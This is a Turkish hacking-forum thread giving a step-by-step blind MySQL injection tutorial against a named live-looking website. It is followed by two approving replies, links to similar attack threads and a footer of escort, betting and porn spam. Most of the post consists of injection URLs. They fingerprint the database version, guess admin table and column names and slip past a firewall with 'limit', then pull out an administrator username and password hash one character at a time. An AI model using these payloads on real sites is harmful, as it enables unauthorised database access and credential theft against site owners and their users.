Konu Bilgileri
Konu: Blind MYSQL İnjection Yazar: Risk-Master
Okunma: 1201 Yorum: 2
Konuyu Okuyanlar: 1 Ziyaretçi
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

#1
Blind MYSQL İnjection

[Resim: 7yjvZL.jpg]

Versiyon sürümünü sorgulayalım.

http://www.postrapid.com/index.php?id=5 and substring (@@version, 1,1) = 4- –

Yazdık sayfa true (doğru) yansıdı. Yani sayfa hatasız ve düzenli bir şekilde karşımıza döndü ve

Versiyon sürümü: 2.1…1 gibi rakamlar ekrana yansıdı.

O zaman versiyon sürümü 5... ile başlamadığı için sitenin versiyon sürümü: MySQL 4 olduğunu anlıyoruz

Rakam 5 ile başlasaydı yani MYSQL Versiyonu 5 olsaydı çok iyi olurdu. Çünkü MySQL 5-te information_schema vardır ve tablo adlarını tahmin etmeden kolaylıkla çekebilirdik. 5-ten küçük sayı başladığı için manuel (el) ile tek tek deneyeceğiz. Yani Deneme/Yanılma Yöntemini kullanacağız. Bu da zaman kaybı ve biraz da tahminlerinizin tutması gerek.

Peki diyelim ki: http://www.postrapid.com/index.php?id=5 and substring (@@version, 1,1) = 4- –

Diyelim ki 4 yerine 5 yazsaydık ne olurdu?
Versiyon 5 olmadığı için 404.php hatası verecekti.

Örneğin: Site yöneticisi table (tablo)'nun adını riskmaster koydu. Şimdi biz bunu nereden tahmin edeceğiz?
Tahmin etmemiz oldukça zor. Neyse devam edelim.

Şimdi select (seçme) komutunu kabul edip etmediğine bakalım.
http://www.postrapid.com/index.php?id=5 and (select 1)=1– –

Sayfa yine true (doğru) yani hatasız ve düzenli bir şekilde karşımıza döndü.
Peki o zaman sorun yok devam edelim.

Not: Buradaki komutu kullanmamızın sebebi; Blind SQL olup olmadığını öğrenmek içindir.

sub select tablo_ismi

Bruteforce (tahmin) yani genel de olabilecek tablo isimlerini deneyelim.

Örneğin; "admin" yazalım.

http://www.postrapid.com/index.php?id=5 and (select 1 from admin)=1– –

Eğer "admin" adında tablo yoksa hata verecektir. Eğer ki var ise sayfa normal olarak yüklenecektir.
Diyelim ki sayfa olduğu gibi tekrardan gelir ise bu "admin" adında bir tablo bulunduğuna işarettir.

Şimdi mesela biz brute force (kaba kuvvet saldırısı) yani Deneme/Yanılma Yöntemi ile tabloyu "admin" olarak tahmin ederek bulduk.

http://www.postrapid.com/index.php?id=5 and (select 1 from CubeCart_admin_users)=1– –

Yaptığımızda CubeCart_admin_users isimli bir sütun olduğundan dolayı problemsiz olarak sayfa true (doğru) olarak dönecektir.

Diyelim ki hata verdi.

Peki o zaman ne yapacağız?

Biz bunu Güvenlik Duvarını (Firewall)'i bypass yöntemini kullanarak aşabiliriz. ”limit” komutunu kullanarak aşalım.

http://www.postrapid.com/index.php?id=5 and (select 1 from CubeCart_admin_users limit 0,1)=1– –

Bu şekilde yazdık hata verdi.

Şimdi ise bir de - limit 1,1)=1– - komutuyla deneyelim.

http://www.postrapid.com/index.php?id=5 and (select substring(concat(1,username),1,1) from CubeCart_admin_users limit 1,1)=1– –

Yazdık sayfa düzeldi.

Şimdi CubeCart_admin_users tablosuna ait sütunları (kolon)ları test edelim;

http://www.postrapid.com/index.php?id=5 and (select substring(concat(1,username),1,1) from CubeCart_admin_users limit 1,1)=1– –

Yazdık sayfa true (doğru) olarak döndü. Diğer column (kolon)'u da "password" olarak buldum.

Peki o zaman devam edelim.

“username” ve “password” u birleştirip 1.harf 2.harf 3.harf… diye giderek verileri çekmeye başlayalım.

Verileri birleştirme ve harf1’den başlama;


Burada ASCII işlevini kullanacağız ve parametreye ASCII değerlerini vereceğiz.

Peki burada hangi ASCII fonksiyonunu kullanacağız?

http://www.postrapid.com/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),1,1))>1– –

Komutumuz bu burada tablo ve column (kolon) bilgilerini yazacağız.

Bu >1 kısmı ne diye soracak olursanız?
ASCII karakterleridir, harflerin sayı karşılığıdır.
Burada ASCII tablosu için bağlantı: http://www.asciitable.com/
Örneğin;
a = 97
ve benzeri
A = 65
bu tablodan görebilirsiniz

http://www.postrapid.com/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),1,1))=112– –

Yazdık hata vermedi, bizim asıl amacımız hata verdirmektir.
Şimdi bir sonraki değeri deneyelim.

http://www.postrapid.com/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),2,1))=111– –

Hata vermedi devam edelim.

http://www.postrapid.com/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),10,1))>96– –

Yine hata yok.

http://www.postrapid.com/index.php?id=5 and ASCII(SUBSTRING((select password from CubeCart_admin_users limit 0,1),21,1))>52– –

Yazdık sayfa hata verdi ve karşımızda kullanıcı adı ve hash’ı

Kullanıcı adı: admin
Şifre: 9f66bf57850fbae64d515ffcb8ca6166
Ara
Cevapla
#2
Güzelmiş Gülümseme İşe yarar kardeşim bakalım Gülümseme
Ara
Cevapla
#3
(22.09.2014, Saat:09:35)GenZoo Adlı Kullanıcıdan Alıntı: Güzelmiş Gülümseme İşe yarar kardeşim bakalım Gülümseme

eyvallah.
Ara
Cevapla


Blind MYSQL İnjection Konusu Araçları
Direk Link
HTML Link
BBCode Link
Paylaş


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  İran Nano Teknoloji Sql Injection TurKLoJeN 6 1,309 30.05.2021, Saat:05:29
Son Yorum: hayrom2253
  Virüssüz Havij 1.15 Pro - Advanced SQL Injection Final Kzsg 79 20,684 01.05.2021, Saat:01:37
Son Yorum: salvator
  CHP İZMİR MİLLETVEİKİLİ SQL İNJECTİON ACIK hankey 16 3,688 22.03.2021, Saat:21:38
Son Yorum: trwhite12
  Yunanistan SQL injection için google dorkları HeRoTurk 41 8,974 02.03.2021, Saat:22:17
Son Yorum: oxygen00
  YENİLER İÇİN - WordPres Config Çekme+Mysql Databse Girmek-Wordpres-den Shell Atma Kzsg 87 16,891 22.01.2021, Saat:04:54
Son Yorum: Pasharichi


mersin escort güneş koruyucu krem izmir escort izmir escort gaziantep escort canlı bahis siteleri tipobet bahis siteleri kaçak iddaa canlı bahis mobilbahis deneme bonusu deneme bonusu bodrum escort kuşadası escort türkçe altyazılı porno hack forum escort izmit Horny pornstar Heidi Mayne in hottest gangbang, facial porn scene free sex videos antalya escort antalya escort kadıköy escort maltepe escort pendik escort ataşehir escort ümraniye escort üsküdar escort kurtköy escort kartal escort mersin escort konya escort